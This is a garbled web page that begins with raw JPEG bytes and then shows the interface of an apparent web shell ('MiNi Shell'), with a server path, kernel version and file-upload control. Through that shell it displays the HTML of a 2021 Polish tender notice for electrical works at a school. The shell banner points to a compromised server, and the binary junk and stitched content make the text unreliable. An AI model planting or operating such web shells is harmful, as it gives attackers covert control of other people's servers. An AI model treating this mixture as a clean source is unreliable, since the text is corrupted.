JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210826/0016093001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa zasilania energetycznego obiektów ZSZ nr 2 w Mińsku Mazowieckim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Zawodowych nr 2 im. Powstańców Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000186980</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gen. K. Sosnkowskiego 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mińsk Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mechanikszkola.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mechanik.home.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa zasilania energetycznego obiektów ZSZ nr 2 w Mińsku Mazowieckim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-857929af-04b3-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00160930</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/55f9ac5d-9fbd-44b0-8491-012c4264a141 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/55f9ac5d-9fbd-44b0-8491-012c4264a141, https://epuap.gov.pl/wps/portal, zamowienia@mechanikszkola.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu ePUAP https://epuap.gov.pl/wps/portal (nazwa odbiorcy: ZESPÓŁ SZKÓŁ ZAWODOWYCH NR 2 IM. POWSTAŃCÓW WARSZAWY W MIŃSKU MAZOWIECKIM) za pośrednictwem formularzy udostępnionych także za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/ w zakładce „dla Wykonawców”, „Formularze do komunikacji”, a także za pomocą poczty e-mail zamowienia@mechanikszkola.com.pl<br/>1.1 Ofertę oraz dokumenty składane wraz z ofertą należy składać przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/ , ePUAPu https://epuap.gov.pl/wps/portal<br/>1.2 Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub<br/>oświadczeń (inna niż oferta Wykonawcy i załączniki do oferty) składane są przez<br/>Wykonawcę elektronicznie za pośrednictwem:<br/>1.2.1 dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>1.2.2 poczty elektronicznej, na adres e-mail zamowienia@mechanikszkola.com.pl<br/>1.3 Zamawiający rekomenduje następujące formaty danych: .pdf oraz .zip, .7z (formaty<br/>poddające dane kompresji), a w przypadku przekazywania wiadomości przy użyciu środków<br/>komunikacji elektronicznej jako tekst wpisany bezpośrednio do niej.<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia BZP lub nr sprawy a także identyfikatorem<br/>postępowania dostępnym na miniPortalu.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu<br/>dostępnym pod adresem https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortalePUAP.<br/>pdf oraz Regulaminie ePUAP https://gov.pl/web/gov/warunki-korzystania<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz<br/>zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do<br/>złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB (dotyczy miniPortalu<br/>oraz ePUAP).<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania na ePUAP.<br/>8. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż<br/>przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/>„RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Dyrektor Zespołu Szkół Zawodowych nr 2 im. Powstańców Warszawy, ul. Gen. Kazimierza Sosnkowskiego 43, 05-300 Mińsk Mazowiecki, e-mail: sekretariat@mechanikszkola.com.pl ;<br/>b) administrator wyznaczył Inspektora Ochrony Danych (IOD), kontakt: e-mail inspektor@mechanikszkola.pl, tel. 25 759 34 77 lub listownie: Zespół Szkół Zawodowych nr 2 im. Powstańców Warszawy, ul. Gen. Kazimierza Sosnkowskiego 43, 05-300 Mińsk Mazowiecki<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z w/w postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>podstawowym bez przeprowadzania negocjacji;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust. 1 ustawy Pzp;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych<br/>danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>i) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KG.2403.1.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Przebudowa zasilania energetycznego obiektów Zespołu Szkół Zawodowych Nr 2 w Mińsku Mazowieckim”<br/>Zakres robót obejmuje między innymi:<br/>- demontaż istniejącej stacji transformatorowej,<br/>- demontaż zewnętrznego oświetlenia terenu,<br/>- wykonanie kablowych odcinków sieci niskiego napięcia nn 0,4kV,<br/>- wykonanie złączy kablowych wolnostojących,<br/>- wykonanie wewnętrznych linii zasilających,<br/>- montaż przeciwpożarowego wyłącznika prądu,<br/>- wykonanie zewnętrznego oświetlenia terenu.<br/>2. Szczegółowy opis przedmiotu zamówienia został określony w Załączniku nr 11 do SWZ –<br/>dokumentacja określająca przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1.1 zdolności do występowania w obrocie gospodarczym – zamawiający nie określa warunku<br/>udziału w postepowaniu w tym zakresie.<br/>1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów – zamawiający nie określa warunku udziału w<br/>postepowaniu w tym zakresie.<br/>1.3 sytuacji ekonomicznej i finansowej<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub<br/>finansowej, jeżeli wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia<br/>150 000,00 PLN.<br/>Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia<br/>Wykonawcy, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału<br/>w postępowaniu – zgodnie z Załącznikiem nr 4 do SWZ.<br/>A w stosunku do Wykonawcy, którego oferta została najwyżej oceniona na podstawie<br/>złożonego na wezwanie Zamawiającego (zgodnie z rozdziałem 20 pkt 1.2) dokumentu<br/>potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej.<br/>1.4 zdolności technicznej lub zawodowej<br/>Wykonawca (firma) spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli<br/>wykaże że:<br/>a) wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej<br/>dwie roboty budowlane o wartości zrealizowanych robót minimum 150.000,00<br/>złotych każda, odpowiadające swoim rodzajem robotom budowlanym stanowiącym<br/>przedmiot zamówienia polegające co najmniej na wykonaniu (przebudowie,<br/>budowie, odnowie, modernizacji, remoncie) zasilania energetycznego obiektów, kablowych odcinków sieci nn 0,4 kV, linii napowietrznej typu oświetlenia ulicznego, <br/>b) dysponuje osobą skierowaną przez wykonawcę do realizacji<br/>zamówienia publicznego, odpowiedzialną za świadczenie usług<br/>- kierownikiem budowy posiadającym dopuszczalne przepisami uprawnienia do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie (do kierowania<br/>robotami budowlanymi) w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne oraz należącym do właściwej Izby Inżynierów Budownictwa lub równoważne.<br/>Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia<br/>Wykonawcy, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału<br/>w postępowaniu – zgodnie z Załącznikiem nr 4 do SWZ.<br/>A w stosunku do Wykonawcy, którego oferta została najwyżej oceniona na podstawie<br/>złożonego na wezwanie Zamawiającego (zgodnie z rozdziałem 20 pkt 1.2) wykazu robót<br/>budowlanych wraz z dowodami, że roboty budowlane zostały wykonane należycie w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone oraz na podstawie złożonego wykazu osób.<br/>W przypadku warunku zdolności technicznej lub zawodowej, w zakresie dysponowania<br/>osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego,<br/>odpowiedzialnymi za kierowanie robotami budowlanymi, zamawiający uznaje:<br/>a) wymagane uprawnienia do kierowania robotami budowlanymi określone w<br/>rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie oraz<br/>b) uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących<br/>przepisów prawnych, a także<br/>c) zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. – Prawo budowlane zamawiający<br/>uznaje również wymagane uprawnienia budowlane do projektowania nabyte w innych<br/>niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stronach<br/>umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na<br/>zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o<br/>Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w<br/>rozumieniu art. 4a ust. 2 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa, osoby wyznaczone do realizacji zamówienia<br/>posiadają uprawnienia budowlane do kierowania robotami budowlanymi, jeżeli:<br/>a) nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie,<br/>równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na<br/>terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień<br/>budowlanych do kierowania robotami budowlanymi, oraz<br/>b) posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku<br/>braku decyzji o uznaniu kwalifikacji zawodowych – zostały spełnione w stosunku do<br/>tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia<br/>2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa,<br/>dotyczące świadczenia usług trans granicznych.<br/>1.5. W przypadku, gdy złożone przez Wykonawcę dokumenty, oświadczenia zawierają dane/informacje w innych walutach niż określono to w niniejszej SWZ, Zamawiający jako kurs<br/>przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu.<br/>Jeżeli w dniu ogłoszenia nie będzie opublikowany średni kurs walut przez NBP, Zamawiający przyjmie<br/>kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji<br/>ogłoszenia o zamówieniu. Kursy walut dostępne są pod następującym adresem internetowym:<br/>http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm. Zamawiający będzie korzystał z „Archiwum<br/>kursów średnich – tabela A” http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx<br/>2. Udostępnianie zasobów.<br/>2.1 Wykonawca w celu potwierdzenia spełniania warunków udziału w postepowaniu może<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>2.2 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonują roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>2.3 Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów, którego wzór stanowi Załącznik nr 5 do<br/>SWZ, na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>2.4 Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 2.3, potwierdza,<br/>że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega w odniesieniu 